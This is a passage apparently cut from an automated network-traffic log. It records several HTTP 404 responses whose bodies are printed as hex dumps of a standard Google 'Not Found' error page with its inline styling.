67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:58:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:01 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 